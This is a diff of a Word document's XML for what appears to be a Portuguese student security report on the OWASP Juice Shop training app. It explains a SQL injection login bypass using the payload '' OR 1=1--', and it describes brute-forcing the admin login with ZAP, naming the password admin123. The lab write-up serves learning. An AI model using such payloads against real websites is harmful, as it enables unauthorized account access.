-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
+        <w:t xml:space="preserve">D – </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7169,13 +8176,6 @@
         <w:t>vulnerabilidades</w:t>
       </w:r>
       <w:bookmarkEnd w:id="14"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7201,17 +8201,51 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Um possível ataque de login para um website que não esteja implementado corretamente para validar os dados inseridos pelo utilizador é:</w:t>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Um possível ataque de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>login</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para um </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>website</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que não esteja implementado corretamente para validar os dados inseridos pelo utilizador é:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7221,6 +8255,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -7233,21 +8268,26 @@
         </w:rPr>
         <w:t xml:space="preserve">Aceder à </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>pagina</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>página</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve"> de login</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7257,23 +8297,25 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
         </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
         <w:t xml:space="preserve">Injetar código SQL que altere a </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>query</w:t>
@@ -7284,12 +8326,28 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> da DB, por exemplo, se a </w:t>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>base de dados</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, por exemplo, se a </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>query</w:t>
@@ -7305,6 +8363,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve">SELECT * FROM </w:t>
@@ -7313,6 +8373,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>Users</w:t>
@@ -7321,66 +8383,126 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE email = '' AND password = '';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> então colocar no email </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>`' OR 1=1--</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">`  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>vai</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> causar que qualquer input colocado no email não </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>importe</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mas sim o 1=1 vai aceitar como um “login válido” para o website e comentar o resto da validação.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE email = '' AND password = ''</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; então colocar no email </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>`' OR 1=1--`</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vai causar que qualquer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>input</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> colocado no email não </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>importe,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mas sim o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>1=1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vai aceitar como um “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>login</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válido” para o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>website</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e comentar o resto da validação.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -7548,12 +8670,30 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">É possível obter o email </w:t>
+        <w:t xml:space="preserve">É possível obter o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>admin</w:t>
@@ -7564,7 +8704,23 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> do website, o que pode permitir outros tipos de ataque.</w:t>
+        <w:t xml:space="preserve"> do </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>website</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>, o que pode permitir outros tipos de ataque.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7585,6 +8741,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Zap</w:t>
       </w:r>
       <w:r>
@@ -7614,6 +8771,8 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -7634,17 +8793,41 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="13"/>
         </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Aceder ao website com o Zap HUD</w:t>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Aceder ao </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>website</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> com o Zap HUD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7654,17 +8837,34 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="13"/>
         </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ir para a página de login e submeter um pedido com o email </w:t>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ir para a página de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>login</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e submeter um pedido com o email </w:t>
       </w:r>
       <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
@@ -7676,6 +8876,13 @@
           <w:t>admin@juice-sh.op</w:t>
         </w:r>
       </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7684,6 +8891,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="13"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -7711,14 +8919,14 @@
           <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -7728,9 +8936,9 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ADEA235" wp14:editId="2158B95C">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ADEA235" wp14:editId="46503145">
             <wp:extent cx="5400040" cy="2889885"/>
-            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:effectExtent l="19050" t="19050" r="10160" b="24765"/>
             <wp:docPr id="1194671196" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -7756,6 +8964,11 @@
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -7766,18 +8979,99 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Deu-se uso a uma </w:t>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – Utilização da ferramenta ZAP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Na figura 7, de</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">u-se uso a uma </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7847,13 +9141,14 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="13"/>
         </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -7914,13 +9209,46 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>sendo a senha correta admin123.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Figura 8)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="017F0439" wp14:editId="66B8C6A1">
-            <wp:extent cx="5400040" cy="708025"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3D7FCA" wp14:editId="438AAB13">
+            <wp:extent cx="5400040" cy="708058"/>
+            <wp:effectExtent l="19050" t="19050" r="10160" b="15875"/>
             <wp:docPr id="1178401247" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -7933,7 +9261,13 @@
